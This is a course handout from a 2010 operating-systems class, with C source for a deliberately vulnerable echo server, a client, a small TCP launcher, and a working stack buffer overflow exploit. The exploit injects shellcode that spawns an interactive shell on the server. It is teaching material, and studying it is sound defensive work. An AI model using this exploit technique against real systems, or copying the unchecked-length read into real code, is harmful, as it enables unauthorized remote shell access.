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I27-handout.txt

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```

1 Handout for CS 372H
2 Class 27
3 29 April 2010
4
5 1. Introduction to buffer overflow attacks
6
7     There are many ways to attack computers. Today we study the
8     "classic" method.
9
10    This method has been adapted to many different types of attacks, but
11    the concepts are similar.
12
13    We study this attack not to teach you all to become hackers but
14    rather to educate about vulnerabilities: what they are, how they
15    work, and how to defend against them. Please remember: _although the
16    approaches used to break into computers are very interesting,
17    breaking in to a computer that you do not own is, in most cases, a
18    criminal act_.
19
20 2. Let's examine a vulnerable server, buggy-server.c
21
22 3. Now let's examine how an unscrupulous element (a hacker, a script
23    kiddie, a worm, etc.) might exploit the server.
24
25
26 Thanks to Russ Cox for the code

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buggy-server.c

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```

1  /*
2  * Author: Russ Cox, rsc@csail.mit.edu
3  * Date: April 28, 2006
4  *
5  * (Comments by MW.)
6  *
7  * A very simple server that expects a message of the form:
8  * <length-of-msg><msg>
9  * and then prints to stdout (i.e., fd = 1) whatever 'msg' the client
10 * supplied.
11 *
12 * The server expects its input on stdin (fd = 0) and writes its
13 * output to stdout (fd = 1). The intent is that these fds actually
14 * correspond to a TCP connection, which intent is realized via the
15 * program tcpserve.
16 *
17 * The server only allocates enough room for 100 bytes for 'msg'.
18 * However, the server does not check that the length of 'msg' is
19 * in fact less than 100 bytes, which is a (common) bug that an
20 * attacker can exploit.
21 *
22 * Ridiculously, this server *tells* the client where in memory
23 * the current stack is located.
24 *
25 */
26 #include <stdio.h>
27 #include <stdlib.h>
28 #include <string.h>
29
30 void
31 serve(void)
32 {
33     int n;
34     char buf[100];
35
36     memset(buf, 0, sizeof buf);
37
38     /*
39     * The server is obliging and actually tells the client where
40     * in memory 'buf' is located.
41     */
42     fprintf(stdout, "the address of the buffer is %p\n", buf);
43
44     /* This next line actually gets stdout to the client */
45     fflush(stdout);
46
47     /* Read in the length from the client; store the length in 'n' */
48     fread(&n, 1, sizeof n, stdin);
49     /* Now read in 'n' bytes from the client. */
50     fread(buf, 1, n, stdin);
51
52     /*
53     * This server is very simple so just tells the client whatever
54     * the client gave the server. A real server would process buf
55     * somehow.
56     */
57     fprintf(stdout, "you gave me: %s\n", buf);
58     fflush(stdout);
59 }
60
61 int
62 main(void)
63 {
64     serve();
65     return 0;
66 }

```

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honest-client.c

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```

1 #include <stdio.h>
2 #include <stdlib.h>
3 #include <unistd.h>
4 #include <errno.h>
5 #include <string.h>
6 #include <sys/types.h>
7 #include <sys/socket.h>
8 #include <netinet/in.h>
9 #include <netinet/tcp.h>
10 #include <arpa/inet.h>
11
12 int dial(uint32_t, uint16_t);
13
14 int
15 main(int argc, char** argv)
16 {
17     char buf[400];
18     int n, fd, addr;
19     uint32_t server_ip_addr; uint16_t server_port;
20     char* msg;
21
22     if (argc != 3) {
23         fprintf(stderr, "usage: %s ip_addr port\n", argv[0]);
24         exit(1);
25     }
26
27     server_ip_addr = inet_addr(argv[1]);
28     server_port = htons(atoi(argv[2]));
29
30     if ((fd = dial(server_ip_addr, server_port)) < 0) {
31         fprintf(stderr, "dial: %s\n", strerror(errno));
32         exit(1);
33     }
34
35     if ((n = read(fd, buf, sizeof buf-1)) < 0) {
36         fprintf(stderr, "socket read: %s\n", strerror(errno));
37         exit(1);
38     }
39     buf[n] = 0;
40     if (strncmp(buf, "the address of the buffer is ", 29) != 0) {
41         fprintf(stderr, "bad message: %s\n", buf);
42         exit(1);
43     }
44     addr = strtoul(buf+29, 0, 0);
45     fprintf(stderr, "remote buffer is %x\n", addr);
46
47     msg = "hello, sad, vulnerable, exploitable server.";
48     n = strlen(msg);
49     write(fd, &n, 4);
50     write(fd, msg, n);
51
52     while((n = read(fd, buf, sizeof buf)) > 0)
53         write(1, buf, n);
54
55     return 0;
56 }
57
58 int
59 dial(uint32_t dest_ip, uint16_t dest_port) {
60     int fd;
61     struct sockaddr_in sin;
62
63     if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
64
65     memset(&sin, 0, sizeof sin);
66     sin.sin_family = AF_INET;
67     sin.sin_port = dest_port;
68     sin.sin_addr.s_addr = dest_ip;
69
70     /* begin a TCP connection to the server */
71     if (connect(fd, (struct sockaddr*)&sin, sizeof sin) < 0) return -1;
72     return fd;
73 }

```

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tcpserve.c

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```

1 /*
2  * Author: Russ Cox, rsc@csail.mit.edu
3  * Date: April 28, 2006
4  *
5  * (Comments by MW.)
6  *
7  * This program is a simplified 'inetd'. That is, this program takes some
8  * other program, 'prog', and runs prog "over the network", by:
9  *
10 *     --listening to a particular TCP port, p
11 *     --creating a new TCP connection every time a client connects
12 *         on p
13 *     --running a new instance of prog, where the stdin and stdout for
14 *         the new process are actually the new TCP connection
15 *
16 * In this way, 'prog' can talk to a TCP client without ever "realizing"
17 * that it is talking over the network. This "replacement" of the usual
18 * values of stdin and stdout with a network connection is exactly what
19 * happens with shell pipes. With pipes, a process's stdin or stdout
20 * becomes the pipe, via the dup2() system call.
21 */
22 #include <stdio.h>
23 #include <stdlib.h>
24 #include <unistd.h>
25 #include <string.h>
26 #include <netdb.h>
27 #include <signal.h>
28 #include <fcntl.h>
29 #include <errno.h>
30 #include <sys/types.h>
31 #include <sys/socket.h>
32 #include <netinet/in.h>
33 #include <arpa/inet.h>
34
35 char **execargs;
36
37 /*
38  * This function contains boilerplate code for setting up a
39  * TCP server. It's called "announce" because, if a network does not
40  * filter ICMP messages, it is clear whether or
41  * not some service is listening on the given port.
42  */
43 int
44 announce(int port)
45 {
46     int fd, n;
47     struct sockaddr_in sin;
48
49     memset(&sin, 0, sizeof sin);
50     sin.sin_family = AF_INET;
51     sin.sin_port = htons(port);
52     sin.sin_addr.s_addr = htonl(INADDR_ANY);
53
54     if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
55         perror("socket");
56         return -1;
57     }
58
59     n = 1;
60     if(setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (char*)&n, sizeof n) < 0){
61         perror("reuseaddr");
62         close(fd);
63         return -1;
64     }
65
66     fcntl(fd, F_SETFD, 1);
67     if(bind(fd, (struct sockaddr*)&sin, sizeof sin) < 0){
68         perror("bind");
69         close(fd);
70         return -1;
71     }
72     if(listen(fd, 10) < 0){
73         perror("listen");

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tcpserve.c

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74         close(fd);
75         return -1;
76     }
77     return fd;
78 }
79
80 int
81 startprog(int fd)
82 {
83     /*
84      * Here is where the replacement of the usual stdin and stdout
85      * happen. The next three lines say, "Ignore whatever value we used to
86      * have for stdin, stdout, and stderr, and replace those three with
87      * the network connection."
88      */
89     dup2(fd, 0);
90     dup2(fd, 1);
91     dup2(fd, 2);
92     if(fd > 2)
93         close(fd);
94
95     /* Now run 'prog' */
96     execvp(execargs[0], execargs);
97
98     /*
99      * If the exec was successful, tcpserve will not make it to this
100     * line.
101     */
102     printf("exec %s: %s\n", execargs[0], strerror(errno));
103     fflush(stdout);
104     exit(0);
105 }
106
107 int
108 main(int argc, char **argv)
109 {
110     int afd, fd, port;
111     struct sockaddr_in sin;
112     struct sigaction sa;
113     socklen_t sn;
114
115     if(argc < 3 || argv[1][0] == '-') {
116         Usage:
117         fprintf(stderr, "usage: tcpserve port prog [args...]\n");
118         return 1;
119     }
120
121     port = atoi(argv[1]);
122     if(port == 0)
123         goto Usage;
124     execargs = argv+2;
125
126     sa.sa_handler = SIG_IGN;
127     sa.sa_flags = SA_NOCLDSTOP|SA_NOCLDWAIT;
128     sigaction(SIGCHLD, &sa, 0);
129
130     if((afd = announce(port)) < 0)
131         return 1;
132
133     sn = sizeof sin;
134     while((fd = accept(afd, (struct sockaddr*)&sin, &sn)) >= 0){
135
136         /*
137          * At this point, 'fd' is the file descriptor that
138          * corresponds to the new TCP connection. The next
139          * line forks off a child process to handle this TCP
140          * connection. That child process will eventually become
141          * 'prog'.
142          */
143         switch(fork()){
144             case -1:
145                 fprintf(stderr, "fork: %s\n", strerror(errno));
146                 close(fd);

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tcpserve.c

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```

147         continue;
148     case 0:
149         /* this case is executed by the child process */
150         startprog(fd);
151         _exit(1);
152     }
153     close(fd);
154 }
155 return 0;
156 }

```

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exploit.c

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```

1  /*
2  * Author: Russ Cox, rsc@csail.mit.edu
3  * Date: April 28, 2006
4  *
5  * (Some very minor modifications by MW, as well as most comments; MW is
6  * responsible for any errors.)
7  *
8  * This program exploits the server buggy-server.c. It works by taking
9  * advantage of the facts that (1) the server has told the client (i.e., us)
10 * the address of its stack and (2) the server is sloppy and does not check
11 * the length of the message to see whether the message can fit in the buffer.
12 *
13 * The exploit sends enough data to overwrite the return address in the
14 * server's current stack frame. That return address will be overwritten to
15 * point to the very buffer we are supplying to the server, which very buffer
16 * contains machine instructions!! The particular machine instructions
17 * cause the server to exec a shell, which means that the server process
18 * will be replaced by a shell, and the exploit will thus have "broken into"
19 * the server.
20 */
21 #include <stdio.h>
22 #include <stdlib.h>
23 #include <unistd.h>
24 #include <errno.h>
25 #include <string.h>
26 #include <sys/types.h>
27 #include <sys/socket.h>
28 #include <netinet/in.h>
29 #include <netinet/tcp.h>
30 #include <arpa/inet.h>
31
32 /*
33 * This is a simple assembly program to exec a shell. The program
34 * is incomplete, though. We cannot complete it until the server obliges
35 * by telling us where its stack is located.
36 */
37
38 char shellcode[] =
39     "\xb8\x0b\x00\x00\x00" /* movl $11, %eax; load the code for 'exec' */
40     "\xbb\x00\x00\x00\x00" /* movl $0, %ebx; INCOMPLETE */
41     "\xb9\x00\x00\x00\x00" /* movl $0, %ecx; INCOMPLETE */
42     "\xba\x00\x00\x00\x00" /* movl $0, %edx; INCOMPLETE */
43     "\xcd\x80" /* int $0x80; do whatever system call is given by %eax */
44     "/bin/sh0" /* "/bin/sh0"; the program we will exec */
45     "-i0" /* "-i0"; the argument to the program */
46     "\x00\x00\x00\x00" /* 0; INCOMPLETE. will be address of string "/bin/sh" */
47     "\x00\x00\x00\x00" /* 0; INCOMPLETE. will be address of string "-i" */
48     "\x00\x00\x00\x00" /* 0 */
49 ;
50
51 enum
52 {
53     /* offsets into assembly */
54     MovEbx = 6, /* constant moved into ebx */
55     MovEcx = 11, /* ... into ecx */
56     MovEdx = 16, /* ... into edx */
57     Arg0 = 22, /* string arg0 ("/bin/sh") */
58     Arg1 = 30, /* string arg1 ("-i") */
59     Arg0Ptr = 33, /* ptr to arg0 (==argv[0]) */
60     Arg1Ptr = 37, /* ptr to arg1 (==argv[1]) */
61     Arg2Ptr = 41 /* zero (==arg[2]) */
62 };
63
64 int dial(uint32_t, uint16_t);
65
66 int
67 main(int argc, char** argv)
68 {
69     char helpfulinfo[100];
70     char msg[400];
71     int i, n, fd, addr;
72     uint32_t victim_ip_addr;
73     uint16_t victim_port;

```

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exploit.c

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```

74     if (argc != 3) {
75         fprintf(stderr, "usage: exploit ip_addr port\n");
76         exit(1);
77     }
78
79     victim_ip_addr = inet_addr(argv[1]);
80     victim_port = htons(atoi(argv[2]));
81
82     fd = dial(victim_ip_addr, victim_port);
83     if (fd < 0) {
84         fprintf(stderr, "dial: %s\n", strerror(errno));
85         exit(1);
86     }
87
88     /*
89     * this line reads the line from the server wherein the server
90     * tells the client where its stack is located. (thank you,
91     * server!)
92     */
93     n = read(fd, helpfulinfo, sizeof helpfulinfo-1);
94     if (n < 0) {
95         fprintf(stderr, "socket read: %s\n", strerror(errno));
96         exit(1);
97     }
98     /* null-terminate our copy of the helpful information */
99     helpfulinfo[n] = 0;
100
101     /*
102     * check to make sure that the server gave us the helpful
103     * information we were expecting.
104     */
105     if (strncmp(helpfulinfo, "the address of the buffer is ", 29) != 0) {
106         fprintf(stderr, "bad message: %s\n", helpfulinfo);
107         exit(1);
108     }
109
110     /*
111     * Pull out the actual address where the server's buf is stored.
112     * we use this address below, as we construct our assembly code.
113     */
114     addr = strtoul(helpfulinfo+29, 0, 0);
115     fprintf(stderr, "remote buffer is at address %x\n", addr);
116
117     /*
118     * Here, we construct the contents of msg. We'll copy the
119     * shell code into msg and also "fill out" this little assembly
120     * program with some needed constants.
121     */
122     memmove(msg, shellcode, sizeof shellcode);
123
124     /*
125     * fill in the arguments to exec. The first argument is a
126     * pointer to the name of the program to execute, so we fill in
127     * the address of the string, "/bin/sh".
128     */
129     *(int*)(msg+MovEbx) = addr+Arg0;
130
131     /*
132     * The second argument is a pointer to the argv array (which is
133     * itself an array of pointers) that the shell will be passed.
134     * This array is currently not filled in, but we can still put a
135     * pointer to the array in the shellcode.
136     */
137     *(int*)(msg+MovEcx) = addr+Arg0Ptr;
138     /* The third argument is the address of a location that holds 0 */
139     *(int*)(msg+MovEdx) = addr+Arg2Ptr;
140
141     /*
142     * The array of addresses mentioned above are the arguments that
143     * /bin/sh should begin with. In our case, /bin/sh only begins
144     * with its own name and "-i", which means "interactive". These
145     * lines load the 'argv' array.
146     */
147     *(int*)(msg+Arg0Ptr) = addr+Arg0;
148     *(int*)(msg+Arg1Ptr) = addr+Arg1;

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exploit.c

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```

147
148      /*
149      * This line is one of the keys -- it places 12 different copies
150      * of our desired return address, which is the start of the message
151      * in the server's address space. We use 12 copies in the hope that
152      * one of them overwrites the return address on the stack. We
153      * could have used more copies. 12 was an arbitrary number that
154      * seemed to do the job.
155      */
156      for(i=0; i<12; i++)
157          *(int*)(msg+100+i*4) = addr;
158
159      n = 100+12*4;
160      /* Tell the server how long our message is. */
161      write(fd, &n, 4);
162      /* And now send the message, thereby smashing the server's stack.*/
163      write(fd, msg, n);
164
165      /* These next lines:
166      * (1) read from the client's stdin, and write to the network
167      * connection (which should now have a shell on the other
168      * end);
169      * (2) read from the network connection, and write to the
170      * client's stdout.
171      *
172      * In other words, these lines take care of the I/O for the
173      * shell that is running on the server. In this way, we on the
174      * client can control the shell that is running on the server.
175      */
176      switch(fork()){
177      case 0:
178          while((n = read(0, msg, sizeof msg)) > 0)
179              write(fd, msg, n);
180          fprintf(stderr, "eof from local\n");
181          break;
182      default:
183          while((n = read(fd, msg, sizeof msg)) > 0)
184              write(1, msg, n);
185          fprintf(stderr, "eof from remote\n");
186          break;
187      }
188      return 0;
189  }
190
191  /* boilerplate networking code for initiating a TCP connection */
192  int
193  dial(uint32_t dest_ip, uint16_t dest_port)
194  {
195      int fd;
196      struct sockaddr_in sin;
197
198      if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
199          return -1;
200
201      memset(&sin, 0, sizeof sin);
202      sin.sin_family = AF_INET;
203      sin.sin_port = dest_port;
204      sin.sin_addr.s_addr = dest_ip;
205
206
207      /* begin a TCP connection to the victim */
208      if (connect(fd, (struct sockaddr*)&sin, sizeof sin) < 0)
209          return -1;
210      return fd;
211  }

```